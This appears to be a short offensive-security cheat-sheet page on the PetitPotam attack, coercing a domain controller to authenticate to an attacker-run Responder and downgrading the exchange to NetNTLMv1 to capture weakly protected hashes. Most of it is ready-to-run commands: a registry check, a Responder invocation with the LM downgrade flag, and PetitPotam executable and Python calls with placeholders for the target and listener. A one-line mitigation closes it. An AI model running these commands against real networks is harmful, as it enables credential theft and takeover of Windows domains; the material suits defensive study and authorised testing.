PetitPotam
Petit Potam
Github repo: https://github.com/topotam/PetitPotam
Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to NetNTLMv1 Challenge/Response authentication. This uses the outdated encryption method DES to protect the NT/LM Hashes.
Requirements:
LmCompatibilityLevel = 0x1: Send LM & NTLM
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevelExploitation
sudo responder -I eth0 --lmIf --disable-ess is set, extended session security will be disabled for NTLMv1 authentication
PetitPotam.exe Responder-IP DC-IP
PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IPWARNING!: : NTLMv1 with SSP(Security Support Provider) changes the server challenge and is not quite ideal for the attack, but it can be used.
MITIGATIONS
Set the Lan Manager authentication level to Send NTLMv2 responses only. Refuse LM & NTLM
Last updated